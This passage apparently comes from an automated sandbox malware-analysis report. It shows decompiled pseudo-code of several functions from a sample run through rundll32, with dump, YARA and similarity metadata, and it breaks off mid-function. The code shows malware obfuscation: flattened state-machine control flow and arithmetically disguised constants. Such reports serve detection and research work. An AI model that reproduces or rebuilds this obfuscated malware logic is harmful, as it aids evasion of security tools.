				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E002DC264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E002CB23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x2e3e0c; // 0x0
								E002D458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E002C8F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E002DDA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E002CB6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E002C7FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E002D1E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E002D8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}






















                                                                                                                                    0x002c81bd
                                                                                                                                    0x002c81c7
                                                                                                                                    0x002c81cf
                                                                                                                                    0x002c81d4
                                                                                                                                    0x002c81dc
                                                                                                                                    0x002c81e4
                                                                                                                                    0x002c81f3
                                                                                                                                    0x002c81f8
                                                                                                                                    0x002c81fe
                                                                                                                                    0x002c8206
                                                                                                                                    0x002c820e
                                                                                                                                    0x002c8219
                                                                                                                                    0x002c8224
                                                                                                                                    0x002c822f
                                                                                                                                    0x002c8237
                                                                                                                                    0x002c823c
                                                                                                                                    0x002c8241
                                                                                                                                    0x002c8246
                                                                                                                                    0x002c824e
                                                                                                                                    0x002c825b
                                                                                                                                    0x002c825c
                                                                                                                                    0x002c8264
                                                                                                                                    0x002c8268
                                                                                                                                    0x002c8270
                                                                                                                                    0x002c8278
                                                                                                                                    0x002c8280
                                                                                                                                    0x002c828e
                                                                                                                                    0x002c8292
                                                                                                                                    0x002c829a
                                                                                                                                    0x002c82a2
                                                                                                                                    0x002c82aa
                                                                                                                                    0x002c82af
                                                                                                                                    0x002c82b7
                                                                                                                                    0x002c82c2
                                                                                                                                    0x002c82ca
                                                                                                                                    0x002c82d5
                                                                                                                                    0x002c82dd
                                                                                                                                    0x002c82e2
                                                                                                                                    0x002c82ea
                                                                                                                                    0x002c82f2
                                                                                                                                    0x002c82fa
                                                                                                                                    0x002c8307
                                                                                                                                    0x002c830b
                                                                                                                                    0x002c8313
                                                                                                                                    0x002c831b
                                                                                                                                    0x002c8323
                                                                                                                                    0x002c832b
                                                                                                                                    0x002c8333
                                                                                                                                    0x002c8338
                                                                                                                                    0x002c8340
                                                                                                                                    0x002c8348
                                                                                                                                    0x002c8355
                                                                                                                                    0x002c8359
                                                                                                                                    0x002c8361
                                                                                                                                    0x002c8369
                                                                                                                                    0x002c8371
                                                                                                                                    0x002c8376
                                                                                                                                    0x002c837e
                                                                                                                                    0x002c8386
                                                                                                                                    0x002c838b
                                                                                                                                    0x002c8393
                                                                                                                                    0x002c839b
                                                                                                                                    0x002c83a8
                                                                                                                                    0x002c83ac
                                                                                                                                    0x002c83b4
                                                                                                                                    0x002c83bc
                                                                                                                                    0x002c83c6
                                                                                                                                    0x002c83ce
                                                                                                                                    0x002c83d6
                                                                                                                                    0x002c83de
                                                                                                                                    0x002c83e6
                                                                                                                                    0x002c83eb
                                                                                                                                    0x002c83f3
                                                                                                                                    0x002c83fb
                                                                                                                                    0x002c8403
                                                                                                                                    0x002c8412
                                                                                                                                    0x002c8415
                                                                                                                                    0x002c8419
                                                                                                                                    0x002c8421
                                                                                                                                    0x002c842c
                                                                                                                                    0x002c8437
                                                                                                                                    0x002c8442
                                                                                                                                    0x002c844a
                                                                                                                                    0x002c844f
                                                                                                                                    0x002c8457
                                                                                                                                    0x002c845f
                                                                                                                                    0x002c8467
                                                                                                                                    0x002c846f
                                                                                                                                    0x002c847f
                                                                                                                                    0x002c8483
                                                                                                                                    0x002c848b
                                                                                                                                    0x002c8493
                                                                                                                                    0x002c849b
                                                                                                                                    0x002c84a0
                                                                                                                                    0x002c84a8
                                                                                                                                    0x002c84bb
                                                                                                                                    0x002c84be
                                                                                                                                    0x002c84c5
                                                                                                                                    0x002c84d0
                                                                                                                                    0x002c84e0
                                                                                                                                    0x002c84e4
                                                                                                                                    0x002c84ec
                                                                                                                                    0x002c84f4
                                                                                                                                    0x002c84fc
                                                                                                                                    0x002c8504
                                                                                                                                    0x002c8510
                                                                                                                                    0x002c8515
                                                                                                                                    0x002c851b
                                                                                                                                    0x002c8520
                                                                                                                                    0x002c8528
                                                                                                                                    0x002c8533
                                                                                                                                    0x002c853e
                                                                                                                                    0x002c8549
                                                                                                                                    0x002c8555
                                                                                                                                    0x002c8558
                                                                                                                                    0x002c855c
                                                                                                                                    0x002c8561
                                                                                                                                    0x002c8566
                                                                                                                                    0x002c856e
                                                                                                                                    0x002c8576
                                                                                                                                    0x002c8580
                                                                                                                                    0x002c8584
                                                                                                                                    0x002c858c
                                                                                                                                    0x002c8594
                                                                                                                                    0x002c8599
                                                                                                                                    0x002c85a1
                                                                                                                                    0x002c85a6
                                                                                                                                    0x002c85ae
                                                                                                                                    0x002c85b6
                                                                                                                                    0x002c85c0
                                                                                                                                    0x002c85c4
                                                                                                                                    0x002c85c8
                                                                                                                                    0x002c85cc
                                                                                                                                    0x002c85d0
                                                                                                                                    0x002c85d4
                                                                                                                                    0x002c85dc
                                                                                                                                    0x002c85e4
                                                                                                                                    0x002c85ec
                                                                                                                                    0x002c85f4
                                                                                                                                    0x002c8607
                                                                                                                                    0x002c860e
                                                                                                                                    0x002c8619
                                                                                                                                    0x002c8621
                                                                                                                                    0x002c8626
                                                                                                                                    0x002c8633
                                                                                                                                    0x002c8637
                                                                                                                                    0x002c863f
                                                                                                                                    0x002c864a
                                                                                                                                    0x002c8655
                                                                                                                                    0x002c8660
                                                                                                                                    0x002c866d
                                                                                                                                    0x002c8671
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x00000000
                                                                                                                                    0x002c867e
                                                                                                                                    0x002c868c
                                                                                                                                    0x002c8806
                                                                                                                                    0x002c880b
                                                                                                                                    0x002c880e
                                                                                                                                    0x002c8810
                                                                                                                                    0x002c8854
                                                                                                                                    0x002c8812
                                                                                                                                    0x002c8812
                                                                                                                                    0x002c8814
                                                                                                                                    0x002c8814
                                                                                                                                    0x002c8818
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c881a
                                                                                                                                    0x002c8832
                                                                                                                                    0x002c8837
                                                                                                                                    0x002c883a
                                                                                                                                    0x002c883c
                                                                                                                                    0x002c884a
                                                                                                                                    0x002c884b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8864
                                                                                                                                    0x002c8864
                                                                                                                                    0x00000000
                                                                                                                                    0x002c883e
                                                                                                                                    0x002c883e
                                                                                                                                    0x002c8840
                                                                                                                                    0x002c8842
                                                                                                                                    0x002c885d
                                                                                                                                    0x002c8844
                                                                                                                                    0x002c8844
                                                                                                                                    0x002c8814
                                                                                                                                    0x002c8818
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8818
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8842
                                                                                                                                    0x002c8814
                                                                                                                                    0x002c8868
                                                                                                                                    0x002c8868
                                                                                                                                    0x002c886a
                                                                                                                                    0x002c888d
                                                                                                                                    0x002c8892
                                                                                                                                    0x00000000
                                                                                                                                    0x002c886c
                                                                                                                                    0x002c8870
                                                                                                                                    0x002c887d
                                                                                                                                    0x002c8883
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8883
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8692
                                                                                                                                    0x002c8698
                                                                                                                                    0x002c87b9
                                                                                                                                    0x002c87be
                                                                                                                                    0x002c87c0
                                                                                                                                    0x002c87c3
                                                                                                                                    0x002c87c6
                                                                                                                                    0x002c87cc
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c869e
                                                                                                                                    0x002c86a4
                                                                                                                                    0x002c874a
                                                                                                                                    0x002c8765
                                                                                                                                    0x002c876a
                                                                                                                                    0x002c876c
                                                                                                                                    0x002c8771
                                                                                                                                    0x002c8776
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c8679
                                                                                                                                    0x00000000
                                                                                                                                    0x002c8679
                                                                                                                                    0x002c86aa
                                                                                                                                    0x002c86b0
                                                                                                                                    0x002c86ff
                                                                                                                                    0x002c870e
                                                                                                                                    0x002c870f
                                                                                                                                    0x002c8710
                                                                                                                                    0x002c871a
                                                                                                                                    0x002c871c
                                                                                                                                    0x002c8722
                                                                                                                                    0x002c8729
                                                                                                                                    0x00000000
                                                                                                                                    0x002c86b2
                                                                                                                                    0x002c86b8
                                                                                                                                    0x002c86f4
                                                                                                                                    0x00000000
                                                                                                                                    0x002c86ba
                                                                                                                                    0x002c86c0
                                                                                                                                    0x002c88b2
                                                                                                                                    0x002c88b2
                                                                                                                                    0x002c88b8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c88be
                                                                                                                                    0x002c86c6
                                                                                                                                    0x002c86dd
                                                                                                                                    0x002c86e2
                                                                                                                                    0x002c86c0
                                                                                                                                    0x002c86b8
                                                                                                                                    0x002c86b0
                                                                                                                                    0x002c86a4
                                                                                                                                    0x002c8698
                                                                                                                                    0x002c86f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002c86f1
                                                                                                                                    0x002c88a2
                                                                                                                                    0x002c88a8
                                                                                                                                    0x002c88ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002c88ad

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                                    • API String ID: 0-1837206032
                                                                                                                                    • Opcode ID: 560c8e2c9d8bb7ba98cce258937ca73dc5a328667f5b0a6bdf414241b3daa064
                                                                                                                                    • Instruction ID: 6f342d154b4d286d166386f334a1e56e9fe1b9f0a9f0fc50dabb877007b2c23c
                                                                                                                                    • Opcode Fuzzy Hash: 560c8e2c9d8bb7ba98cce258937ca73dc5a328667f5b0a6bdf414241b3daa064
                                                                                                                                    • Instruction Fuzzy Hash: A50241711183819FD368CF25C48AA5BBBE1FBC4758F508A1DF2DA86260DBB48849CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002DC631 Relevance: 9.0, Strings: 7, Instructions: 218COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002DC631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E002C474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E002C474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E002C474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E002DC2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E002C474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E002C474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E002DC2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}








































                                                                                                                                    0x002dc631
                                                                                                                                    0x002dc638
                                                                                                                                    0x002dc63a
                                                                                                                                    0x002dc644
                                                                                                                                    0x002dc649
                                                                                                                                    0x002dc64e
                                                                                                                                    0x002dc656
                                                                                                                                    0x002dc65e
                                                                                                                                    0x002dc666
                                                                                                                                    0x002dc66e
                                                                                                                                    0x002dc676
                                                                                                                                    0x002dc67e
                                                                                                                                    0x002dc682
                                                                                                                                    0x002dc68a
                                                                                                                                    0x002dc692
                                                                                                                                    0x002dc697
                                                                                                                                    0x002dc69f
                                                                                                                                    0x002dc6a7
                                                                                                                                    0x002dc6af
                                                                                                                                    0x002dc6b7
                                                                                                                                    0x002dc6bf
                                                                                                                                    0x002dc6c7
                                                                                                                                    0x002dc6cf
                                                                                                                                    0x002dc6d7
                                                                                                                                    0x002dc6e2
                                                                                                                                    0x002dc6e4
                                                                                                                                    0x002dc6e9
                                                                                                                                    0x002dc6ef
                                                                                                                                    0x002dc6f7
                                                                                                                                    0x002dc6fc
                                                                                                                                    0x002dc704
                                                                                                                                    0x002dc70c
                                                                                                                                    0x002dc714
                                                                                                                                    0x002dc719
                                                                                                                                    0x002dc721
                                                                                                                                    0x002dc729
                                                                                                                                    0x002dc731
                                                                                                                                    0x002dc736
                                                                                                                                    0x002dc73e
                                                                                                                                    0x002dc746
                                                                                                                                    0x002dc74b
                                                                                                                                    0x002dc750
                                                                                                                                    0x002dc758
                                                                                                                                    0x002dc760
                                                                                                                                    0x002dc76c
                                                                                                                                    0x002dc771
                                                                                                                                    0x002dc777
                                                                                                                                    0x002dc77f
                                                                                                                                    0x002dc787
                                                                                                                                    0x002dc793
                                                                                                                                    0x002dc796
                                                                                                                                    0x002dc79a
                                                                                                                                    0x002dc7a2
                                                                                                                                    0x002dc7aa
                                                                                                                                    0x002dc7b7
                                                                                                                                    0x002dc7bb
                                                                                                                                    0x002dc7c3
                                                                                                                                    0x002dc7d0
                                                                                                                                    0x002dc7d4
                                                                                                                                    0x002dc7d9
                                                                                                                                    0x002dc7e1
                                                                                                                                    0x002dc7e9
                                                                                                                                    0x002dc7f1
                                                                                                                                    0x002dc7f9
                                                                                                                                    0x002dc801
                                                                                                                                    0x002dc813
                                                                                                                                    0x002dc817
                                                                                                                                    0x002dc81f
                                                                                                                                    0x002dc827
                                                                                                                                    0x002dc834
                                                                                                                                    0x002dc838
                                                                                                                                    0x002dc840
                                                                                                                                    0x002dc848
                                                                                                                                    0x002dc850
                                                                                                                                    0x002dc858
                                                                                                                                    0x002dc860
                                                                                                                                    0x002dc868
                                                                                                                                    0x002dc870
                                                                                                                                    0x002dc878
                                                                                                                                    0x002dc880
                                                                                                                                    0x002dc888
                                                                                                                                    0x002dc890
                                                                                                                                    0x002dc898
                                                                                                                                    0x002dc8a5
                                                                                                                                    0x002dc8ae
                                                                                                                                    0x002dc8b2
                                                                                                                                    0x002dc8ba
                                                                                                                                    0x002dc8c2
                                                                                                                                    0x002dc8ca
                                                                                                                                    0x002dc8cf
                                                                                                                                    0x002dc8d7
                                                                                                                                    0x002dc8df
                                                                                                                                    0x002dc8e4
                                                                                                                                    0x002dc8e9
                                                                                                                                    0x002dc8f1
                                                                                                                                    0x002dc8f9
                                                                                                                                    0x002dc901
                                                                                                                                    0x002dc909
                                                                                                                                    0x002dc911
                                                                                                                                    0x002dc911
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc919
                                                                                                                                    0x002dc91b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc921
                                                                                                                                    0x002dc9e2
                                                                                                                                    0x002dc9e3
                                                                                                                                    0x002dc9e4
                                                                                                                                    0x002dc9e9
                                                                                                                                    0x002dc9ec
                                                                                                                                    0x002dc9f1
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc927
                                                                                                                                    0x002dc92d
                                                                                                                                    0x002dc9c0
                                                                                                                                    0x002dc9c1
                                                                                                                                    0x002dc9c2
                                                                                                                                    0x002dc9c7
                                                                                                                                    0x002dc9ca
                                                                                                                                    0x002dc9cf
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc933
                                                                                                                                    0x002dc939
                                                                                                                                    0x002dc99e
                                                                                                                                    0x002dc99f
                                                                                                                                    0x002dc9a0
                                                                                                                                    0x002dc9a5
                                                                                                                                    0x002dc9a8
                                                                                                                                    0x002dc9ad
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc93b
                                                                                                                                    0x002dc941
                                                                                                                                    0x002dc97d
                                                                                                                                    0x002dc981
                                                                                                                                    0x002dc986
                                                                                                                                    0x002dc989
                                                                                                                                    0x002dc98e
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc943
                                                                                                                                    0x002dc949
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc94f
                                                                                                                                    0x002dc95b
                                                                                                                                    0x002dc95c
                                                                                                                                    0x002dc95d
                                                                                                                                    0x002dc962
                                                                                                                                    0x002dc965
                                                                                                                                    0x002dc96a
                                                                                                                                    0x00000000
                                                                                                                                    0x002dc96a
                                                                                                                                    0x002dc949
                                                                                                                                    0x002dc941
                                                                                                                                    0x002dc939
                                                                                                                                    0x002dc92d
                                                                                                                                    0x002dca5f
                                                                                                                                    0x002dca68
                                                                                                                                    0x002dca68
                                                                                                                                    0x002dc9fe
                                                                                                                                    0x002dca26
                                                                                                                                    0x002dca27
                                                                                                                                    0x002dca28
                                                                                                                                    0x002dca2d
                                                                                                                                    0x002dca30
                                                                                                                                    0x002dca32
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca00
                                                                                                                                    0x002dca06
                                                                                                                                    0x002dca5d
                                                                                                                                    0x002dca08
                                                                                                                                    0x002dca0e
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca10
                                                                                                                                    0x002dca10
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca10
                                                                                                                                    0x002dca0e
                                                                                                                                    0x002dca06
                                                                                                                                    0x00000000
                                                                                                                                    0x002dca34
                                                                                                                                    0x002dca34
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )L$Eh$QGf$w)!$}+$%l$i _
                                                                                                                                    • API String ID: 0-3797278058
                                                                                                                                    • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                    • Instruction ID: 85e5c9fdae5bc61f0451f0e4374cd9303f1fe4b7d18bc225d319d18552fe665e
                                                                                                                                    • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                    • Instruction Fuzzy Hash: 81A141B28183429FC348CF25D48A85FFBE1BB85748F504A1EF595A6220D3B5DA19CF83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 002CE2CC Relevance: 8.9, Strings: 7, Instructions: 178COMMONCrypto
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002CE2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E002C8E4D);
				_push(__edx);
				E002D20B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
